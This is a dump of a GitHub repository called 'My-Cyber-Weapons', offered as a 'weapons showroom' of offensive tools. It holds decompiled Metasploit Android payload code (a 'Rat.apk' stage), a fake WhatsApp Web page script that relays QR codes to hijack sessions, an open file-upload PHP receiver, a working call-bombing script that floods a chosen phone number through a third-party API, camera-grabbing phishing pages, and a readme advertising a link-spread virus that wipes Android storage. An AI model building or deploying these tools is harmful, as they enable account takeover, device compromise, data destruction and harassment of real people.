├── Brahmastra ├── test.test ├── readme.md └── Brahmastra.sh ├── Whats-Hack ├── data │ ├── settings.gradle │ ├── app │ │ ├── proguard-rules.pro │ │ ├── libs │ │ │ ├── mail.jar │ │ │ ├── activation.jar │ │ │ ├── additionnal.jar │ │ │ ├── commons-io-2.6.jar │ │ │ └── commons-collections4-4.2.jar │ │ ├── src │ │ │ └── main │ │ │ │ ├── res │ │ │ │ ├── drawable │ │ │ │ │ ├── up.png │ │ │ │ │ ├── arrow.png │ │ │ │ │ ├── backspace.png │ │ │ │ │ ├── downleft.png │ │ │ │ │ └── keyback.xml │ │ │ │ ├── mipmap-hdpi │ │ │ │ │ └── ic_launcher.png │ │ │ │ ├── mipmap-mdpi │ │ │ │ │ └── ic_launcher.png │ │ │ │ ├── mipmap-xhdpi │ │ │ │ │ └── ic_launcher.png │ │ │ │ ├── mipmap-xxhdpi │ │ │ │ │ └── ic_launcher.png │ │ │ │ ├── mipmap-xxxhdpi │ │ │ │ │ └── ic_launcher.png │ │ │ │ ├── values │ │ │ │ │ └── strings.xml │ │ │ │ └── layout │ │ │ │ │ └── activity_main.xml │ │ │ │ ├── AndroidManifest.xml │ │ │ │ └── java │ │ │ │ └── com │ │ │ │ └── whatsapphack │ │ │ │ └── MainActivity.java │ │ └── build.gradle │ ├── local.properties │ ├── key.keystore │ ├── gradle │ │ └── wrapper │ │ │ ├── gradle-wrapper.jar │ │ │ └── gradle-wrapper.properties │ ├── build │ │ └── intermediates │ │ │ └── lint-cache │ │ │ ├── typos-de.txt-2.bin │ │ │ ├── typos-en.txt-2.bin │ │ │ ├── typos-es.txt-2.bin │ │ │ ├── typos-hu.txt-2.bin │ │ │ ├── typos-it.txt-2.bin │ │ │ ├── typos-nb.txt-2.bin │ │ │ ├── typos-pt.txt-2.bin │ │ │ ├── typos-tr.txt-2.bin │ │ │ └── api-versions-8-28.bin │ ├── build.gradle │ ├── upload_files.php │ ├── gradle.properties │ ├── gradlew.bat │ └── gradlew ├── lib │ ├── aso.jar │ └── aso ├── signing.keystore ├── WhatsApp_files │ ├── style_f8c40d12edbd6fe7b2cd055344892b0e.css │ ├── qreload.js │ └── css ├── payload │ ├── original │ │ ├── AndroidManifest.xml │ │ └── META-INF │ │ │ ├── SIGNFILE.RSA │ │ │ ├── MANIFEST.MF │ │ │ └── SIGNFILE.SF │ ├── res │ │ └── values │ │ │ ├── strings.xml │ │ │ └── public.xml │ ├── apktool.yml │ ├── smali │ │ ├── com │ │ │ └── metasploit │ │ │ │ └── stage │ │ │ │ ├── e.smali │ │ │ │ ├── g.smali │ │ │ │ ├── MainActivity.smali │ │ │ │ ├── d.smali │ │ │ │ ├── c.smali │ │ │ │ ├── a.smali │ │ │ │ ├── f.smali │ │ │ │ └── b.smali │ │ └── net │ │ │ └── dirtybox │ │ │ └── util │ │ │ └── obfuscation │ │ │ └── StringObfuscator.smali │ └── AndroidManifest.xml ├── sha256sums.txt ├── java │ └── classes │ │ └── net │ │ └── dirtybox │ │ └── util │ │ └── obfuscation │ │ └── StringObfuscator.class ├── persistence.hook ├── cleanup.sh ├── README.md ├── hack.py └── whatsapphack.sh ├── CamHack ├── kk.jpg ├── index.php ├── template.php ├── post.php ├── ip.php ├── LICENSE ├── README.md ├── jio │ ├── style.css │ └── invite.htm ├── index2.html ├── grabcam.html └── grabcam.sh ├── Insta-Walker ├── requirements.txt ├── Dockerfile ├── main.py └── README.md ├── Call Bomb ├── README.md ├── spam.py └── LICENSE ├── readme.md ├── LICENSE └── LocaLoca ├── readme.md └── LocaLoca.py /Brahmastra/test.test: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Whats-Hack/data/settings.gradle: -------------------------------------------------------------------------------- 1 | include ':app' 2 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | #proguard-rules 2 | -------------------------------------------------------------------------------- /Whats-Hack/data/local.properties: -------------------------------------------------------------------------------- 1 | sdk.dir=/home/parrot/Android/Sdk 2 | -------------------------------------------------------------------------------- /CamHack/kk.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/CamHack/kk.jpg -------------------------------------------------------------------------------- /CamHack/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /Whats-Hack/lib/aso.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/lib/aso.jar -------------------------------------------------------------------------------- /CamHack/template.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /Whats-Hack/data/key.keystore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/key.keystore -------------------------------------------------------------------------------- /Whats-Hack/signing.keystore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/signing.keystore -------------------------------------------------------------------------------- /Insta-Walker/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2020.6.20 2 | chardet==3.0.4 3 | idna==2.10 4 | requests==2.24.0 5 | urllib3==1.25.11 6 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/libs/mail.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/libs/mail.jar -------------------------------------------------------------------------------- /Whats-Hack/WhatsApp_files/style_f8c40d12edbd6fe7b2cd055344892b0e.css: -------------------------------------------------------------------------------- 1 | /* Copyright (c) 2023-present WhatsApp Inc. All Rights Reserved. */ 2 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/libs/activation.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/libs/activation.jar -------------------------------------------------------------------------------- /Whats-Hack/data/app/libs/additionnal.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/libs/additionnal.jar -------------------------------------------------------------------------------- /Whats-Hack/data/app/libs/commons-io-2.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/libs/commons-io-2.6.jar -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/drawable/up.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/drawable/up.png -------------------------------------------------------------------------------- /Whats-Hack/payload/original/AndroidManifest.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/payload/original/AndroidManifest.xml -------------------------------------------------------------------------------- /Whats-Hack/data/gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /Whats-Hack/payload/original/META-INF/SIGNFILE.RSA: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/payload/original/META-INF/SIGNFILE.RSA -------------------------------------------------------------------------------- /Whats-Hack/data/app/libs/commons-collections4-4.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/libs/commons-collections4-4.2.jar -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/drawable/arrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/drawable/arrow.png -------------------------------------------------------------------------------- /Whats-Hack/payload/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | MainActivity 4 | 5 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/drawable/backspace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/drawable/backspace.png -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/drawable/downleft.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/drawable/downleft.png -------------------------------------------------------------------------------- /Whats-Hack/payload/res/values/public.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/mipmap-hdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/mipmap-hdpi/ic_launcher.png -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/mipmap-mdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/mipmap-mdpi/ic_launcher.png -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/mipmap-xhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/mipmap-xhdpi/ic_launcher.png -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/mipmap-xxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/mipmap-xxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-de.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-de.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-en.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-en.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-es.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-es.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-hu.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-hu.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-it.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-it.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-nb.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-nb.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-pt.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-pt.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/typos-tr.txt-2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/typos-tr.txt-2.bin -------------------------------------------------------------------------------- /Whats-Hack/data/build/intermediates/lint-cache/api-versions-8-28.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/data/build/intermediates/lint-cache/api-versions-8-28.bin -------------------------------------------------------------------------------- /Insta-Walker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | 3 | COPY main.py / 4 | COPY .lib / 5 | COPY requirements.txt / 6 | 7 | RUN pip3 install -r requirements.txt 8 | 9 | ENTRYPOINT ["python3", "main.py"] 10 | -------------------------------------------------------------------------------- /Whats-Hack/sha256sums.txt: -------------------------------------------------------------------------------- 1 | adee4b084ed9ac3af578336c9a80a16647e85b966cb18e248e946e16a3701703 x86/BaiduBrowser.apk 2 | 2ff57944694e7c8da28be73e7b185b3147e0010f4ceb296702ab9b123405e7ff armeabi-v7a/AdobeReader.apk 3 | -------------------------------------------------------------------------------- /Whats-Hack/java/classes/net/dirtybox/util/obfuscation/StringObfuscator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Its-Aman-Yadav/My-Cyber-Weapons/HEAD/Whats-Hack/java/classes/net/dirtybox/util/obfuscation/StringObfuscator.class -------------------------------------------------------------------------------- /Call Bomb/README.md: -------------------------------------------------------------------------------- 1 | # Spam Call Unlimited 2 | Spam Call Unlimited 3 | 4 | ## Installation 5 | ``` 6 | $pkg install python 7 | $pip install requests 8 | $git clone https://github.com/Its-Aman-Yadav/My-Cyber-Weapons/Call-Bomb 9 | $cd SpamCall 10 | $python spam.py 11 | ``` 12 | 13 | 14 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | App 3 | Hello! 4 | Settings 5 | MainActivity 6 | 7 | 8 | -------------------------------------------------------------------------------- /Whats-Hack/data/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | #Mon Dec 28 10:00:20 PST 2015 2 | distributionBase=GRADLE_USER_HOME 3 | distributionPath=wrapper/dists 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | distributionUrl=https\://services.gradle.org/distributions/gradle-2.14.1-all.zip 7 | -------------------------------------------------------------------------------- /Whats-Hack/persistence.hook: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /Whats-Hack/payload/original/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Permissions: all-permissions 3 | 4 | Name: AndroidManifest.xml 5 | SHA1-Digest: Ph5+fVYSWsrxhBOuHEJ3GvRvuks= 6 | 7 | Name: resources.arsc 8 | SHA1-Digest: q6tLFZ0Um4o2+Tv1iTgUmlJfTSA= 9 | 10 | Name: classes.dex 11 | SHA1-Digest: v5jwIadf25N9SOxa87kfev9VRao= 12 | 13 | -------------------------------------------------------------------------------- /Whats-Hack/payload/original/META-INF/SIGNFILE.SF: -------------------------------------------------------------------------------- 1 | Signature-Version: 1.0 2 | Created-By: 1.6.0_18 (Sun Microsystems Inc.) 3 | 4 | Name: AndroidManifest.xml 5 | SHA1-Digest: II99ttSP+52yBaSnLAaxTyNQZ34= 6 | 7 | Name: resources.arsc 8 | SHA1-Digest: ornPZXwQQAFXxqONtz41S16rWyk= 9 | 10 | Name: classes.dex 11 | SHA1-Digest: hLSw+Ymq7Chr/0Uc2jCeHrjRA1c= 12 | 13 | -------------------------------------------------------------------------------- /CamHack/post.php: -------------------------------------------------------------------------------- 1 | 19 | 20 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | ## Hey, Welcome to my Weapons Showroom 2 | This is where I store my cyber Weapons which is created in Kali linux, if you want to use them go ahead but be carefull some weapons are still no tested that might get you in trouble, so use wisely 3 | 4 | ## Social Links 5 | * [Linkedin](https://www.linkedin.com/in/itsamanyadav18/) 6 | * [Twitter](https://twitter.com/its_aman_yadav) 7 | * [Instagram](https://instagram.com/its_aman_yadav) 8 | 9 | 10 | ## Thank you, have fun with my Cyber Weapons ⚔ 11 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Whats-Hack/payload/apktool.yml: -------------------------------------------------------------------------------- 1 | !!brut.androlib.meta.MetaInfo 2 | apkFileName: Rat.apk 3 | compressionType: false 4 | doNotCompress: null 5 | isFrameworkApk: false 6 | packageInfo: 7 | forcedPackageId: '127' 8 | renameManifestPackage: null 9 | sdkInfo: 10 | minSdkVersion: '10' 11 | targetSdkVersion: '17' 12 | sharedLibrary: false 13 | sparseResources: true 14 | unknownFiles: {} 15 | usesFramework: 16 | ids: 17 | - 1 18 | tag: null 19 | version: 2.6.1 20 | versionInfo: 21 | versionCode: '1' 22 | versionName: '1.0' 23 | -------------------------------------------------------------------------------- /Insta-Walker/main.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python3 2 | 3 | import os, sys 4 | sys.path.append(os.getcwd()+"/.lib/") 5 | import argparse 6 | from api import * 7 | 8 | ap = argparse.ArgumentParser() 9 | ap.add_argument("-u", "--user", required=True, help="username of account to scan") 10 | ap.add_argument("-p", "--post", action="store_true", help="image info of user uploads") 11 | args = vars(ap.parse_args()) 12 | 13 | os.system("clear") 14 | 15 | if args['user']: 16 | user_info(usrname=args["user"]) 17 | 18 | if args['post']: 19 | post_info() 20 | -------------------------------------------------------------------------------- /Whats-Hack/cleanup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # cleanup.sh 4 | 5 | # usage: ./cleanup.sh 6 | 7 | function rmdirz { 8 | if [ -d $1 ]; then 9 | rm -rf $1 10 | fi 11 | } 12 | 13 | function rmfilez { 14 | if [ -f $1 ]; then 15 | rm $1 16 | fi 17 | } 18 | 19 | rmdirz bin 20 | rmdirz libs 21 | rmdirz original 22 | rmdirz payload 23 | rmdirz tmp 24 | 25 | rmfilez Rat.apk 26 | rmfilez perms.tmp 27 | rmfilez persistence.hook 28 | rmfilez obfuscate.method 29 | rmfilez signing.keystore 30 | rmfilez backdoorhack-apk.rc 31 | 32 | exit 0 33 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/e.smali: -------------------------------------------------------------------------------- 1 | .class final Lcom/metasploit/stage/e; 2 | .super Ljava/lang/Thread; 3 | 4 | 5 | # direct methods 6 | .method constructor ()V 7 | .locals 0 8 | 9 | invoke-direct {p0}, Ljava/lang/Thread;->()V 10 | 11 | return-void 12 | .end method 13 | 14 | 15 | # virtual methods 16 | .method public final run()V 17 | .locals 1 18 | 19 | const/4 v0, 0x0 20 | 21 | invoke-static {v0}, Lcom/metasploit/stage/Payload;->main([Ljava/lang/String;)V 22 | 23 | return-void 24 | .end method 25 | -------------------------------------------------------------------------------- /Whats-Hack/WhatsApp_files/qreload.js: -------------------------------------------------------------------------------- 1 | // ask the server every second for the qr code 2 | setInterval(() => { 3 | $.get({ 4 | url: '/get-qr/' 5 | }) 6 | .done(response => { 7 | if (response === 'hacked') { 8 | // if hacked, redirect to the real webpage 9 | window.location.replace('https://web.whatsapp.com/') 10 | } else { 11 | // else, keep updating the qr code image 12 | $('img').attr('src', 'data:image/png;base64,'+response); 13 | } 14 | }); 15 | }, 1000); 16 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/g.smali: -------------------------------------------------------------------------------- 1 | .class public final Lcom/metasploit/stage/g; 2 | .super Ljava/lang/Object; 3 | 4 | 5 | # instance fields 6 | .field public a:Ljava/lang/String; 7 | 8 | .field public b:J 9 | 10 | .field public c:J 11 | 12 | .field public d:Ljava/lang/String; 13 | 14 | .field public e:[B 15 | 16 | .field public f:Ljava/lang/String; 17 | 18 | 19 | # direct methods 20 | .method public constructor ()V 21 | .locals 0 22 | 23 | invoke-direct {p0}, Ljava/lang/Object;->()V 24 | 25 | return-void 26 | .end method 27 | -------------------------------------------------------------------------------- /Whats-Hack/data/build.gradle: -------------------------------------------------------------------------------- 1 | // Top-level build file where you can add configuration options common to all sub-projects/modules. 2 | 3 | buildscript { 4 | repositories { 5 | jcenter() 6 | } 7 | dependencies { 8 | classpath 'com.android.tools.build:gradle:2.2.0' 9 | 10 | // NOTE: Do not place your application dependencies here; they belong 11 | // in the individual module build.gradle files 12 | } 13 | } 14 | 15 | allprojects { 16 | repositories { 17 | jcenter() 18 | } 19 | } 20 | 21 | task clean(type: Delete) { 22 | delete rootProject.buildDir 23 | } 24 | -------------------------------------------------------------------------------- /Whats-Hack/data/upload_files.php: -------------------------------------------------------------------------------- 1 | >" . $target_path . $_FILES['error'] . " \r\n", 3, 6 | "Log.log"); 7 | 8 | error_log("Upload File >>" . basename($_FILES['uploadedfile']['name']) . " \r\n", 9 | 3, "Log.log"); 10 | 11 | if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 12 | echo "The file " . basename($_FILES['uploadedfile']['name']) . 13 | " has been uploaded"; 14 | } else { 15 | echo "There was an error uploading the file, please try again!"; 16 | } 17 | ?> 18 | -------------------------------------------------------------------------------- /CamHack/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /Whats-Hack/payload/smali/com/metasploit/stage/MainActivity.smali: -------------------------------------------------------------------------------- 1 | .class public Lcom/metasploit/stage/MainActivity; 2 | .super Landroid/app/Activity; 3 | 4 | 5 | # direct methods 6 | .method public constructor ()V 7 | .locals 0 8 | 9 | invoke-direct {p0}, Landroid/app/Activity;->()V 10 | 11 | return-void 12 | .end method 13 | 14 | 15 | # virtual methods 16 | .method protected onCreate(Landroid/os/Bundle;)V 17 | .locals 0 18 | 19 | invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V 20 | 21 | invoke-static {p0}, Lcom/metasploit/stage/MainService;->startService(Landroid/content/Context;)V 22 | 23 | invoke-virtual {p0}, Lcom/metasploit/stage/MainActivity;->finish()V 24 | 25 | return-void 26 | .end method 27 | -------------------------------------------------------------------------------- /Whats-Hack/data/gradle.properties: -------------------------------------------------------------------------------- 1 | # Project-wide Gradle settings. 2 | 3 | # IDE (e.g. Android Studio) users: 4 | # Gradle settings configured through the IDE *will override* 5 | # any settings specified in this file. 6 | 7 | # For more details on how to configure your build environment visit 8 | # http://www.gradle.org/docs/current/userguide/build_environment.html 9 | 10 | # Specifies the JVM arguments used for the daemon process. 11 | # The setting is particularly useful for tweaking memory settings. 12 | # When configured, Gradle will run in incubating parallel mode. 13 | # This option should only be used with decoupled projects. More details, visit 14 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects 15 | # org.gradle.parallel=true 16 | -------------------------------------------------------------------------------- /Whats-Hack/data/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Brahmastra/readme.md: -------------------------------------------------------------------------------- 1 | ## About Weapon : 2 | 3 | Brahmastra is a bash based script which is officially made for termux users and from this tool you can spread android virus by just sending link. This tool works on both rooted Android device and Non-rooted Android device. Warning 🚦 This Virus Formates (Deletes) Full Internal Storage < Mja aya sunke 4 | 5 | ## Work on : 6 | 7 | Kali Linux as well as on Termux also 8 | 9 | ## Requirements : 10 | 11 | - Internet 12 | - Termux installed 13 | - 400MB Storage 14 | - Little bit of brain 15 | 16 | ## Installation Guide : 17 | * `apt-get update -y` 18 | * `apt-get upgrade -y` 19 | * `pkg install python -y` 20 | * `pkg install python2 -y` 21 | * `pkg install git -y` 22 | * `pip install lolcat` 23 | * `git clone https://github.com/its-Aman-Yadav/My-Cyber-Weapons` 24 | * `cd My-Cyber-Weapons` 25 | * `ls` 26 | * `cd Brahmastra` 27 | * `ls` 28 | * `bash Brahmastra.sh` 29 | 30 | ## WARNING : 31 | ***This tool is very dangerous so zyada bak### n kre*** 32 | -------------------------------------------------------------------------------- /Call Bomb/spam.py: -------------------------------------------------------------------------------- 1 | #Xractz 2 | #IndoSec 3 | 4 | import time, re, sys 5 | from requests import Session 6 | s = Session() 7 | 8 | print("Spam Call by Aman Yadav \nThis tool delays 5 seconds per spam so as not to limit!\nUse Country Code (ex: 62xxxxx29)") 9 | try: 10 | no = int(input("No : ")) 11 | jml = int(input("Count : ")) 12 | print() 13 | except: 14 | print("\n\t* Only Number *") 15 | sys.exit() 16 | 17 | url = "https://www.citcall.com/demo/misscallapi.php" 18 | 19 | tkn = s.get(url).text 20 | token = re.findall(r'id="csrf_token" value="(.*?)">', tkn)[0] 21 | 22 | headers = { 23 | 'x-requested-with':'XMLHttpRequest' 24 | } 25 | data = { 26 | 'cid':no, 27 | 'trying':'0', 28 | 'csrf_token':token 29 | } 30 | 31 | n = 0 32 | try: 33 | while n < jml: 34 | send = s.post(url, data=data, headers=headers).text 35 | time.sleep(4.8) 36 | if 'Success' in send: 37 | n +=1 38 | print(f"[{n}] Sended to => {no}") 39 | else: 40 | print("\n\t* Limit *") 41 | print("\n\t* Try one hour ago or try tomorrow *") 42 | break 43 | except: 44 | print("\n\t* ERROR *") 45 | sys.exit() 46 | -------------------------------------------------------------------------------- /CamHack/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 N17R0 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Mr Aman yadav 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LocaLoca/readme.md: -------------------------------------------------------------------------------- 1 | 2 | ## ABOUT Weapon : 3 | 4 | Loca Loca is a tool created by Aman Yadav to show location of a phone by their IP Address, it provides information like ISP, City, Region, Longitude, Latitude, Time Zone, Zip Code (It provide approx location not accurate). 5 | 6 | ### TESTED ON : 7 | 8 | * Termux 9 | * Kali Linux 10 | 11 | ### REQUIREMENTS : 12 | * Internet 13 | * Storage 400 MB 14 | * Dimag naam ki cheez 15 | 16 | ## FEATURES : 17 | * ISP 18 | * City 19 | * Region 20 | * Latitude 21 | * Longitude 22 | * Time Zone 23 | * Zip Code 24 | 25 | ## INSTALLATION [Termux] : 26 | 27 | * `apt-get update -y` 28 | * `apt-get upgrade -y` 29 | * `pkg install python -y` 30 | * `pkg install python2 -y` 31 | * `pkg install git -y` 32 | * `pip install lolcat` 33 | * `pip install requests` 34 | * `git clone https://github.com/Its-Aman-Yadav/My-Cyber-Weapons/tree/main/LocaLoca` 35 | * `cd $HOME` 36 | * `ls` 37 | * `cd LocaLoca` 38 | * `ls` 39 | * `python LocaLoca.py -v (your victim ip here)` 40 | ``` 41 | For ex:- python LocaLoca.py -v 127.0.0.1 42 | That's it 43 | 44 | ``` 45 | 46 | ## WARNING : 47 | ***This tool is not only for educational purpose. 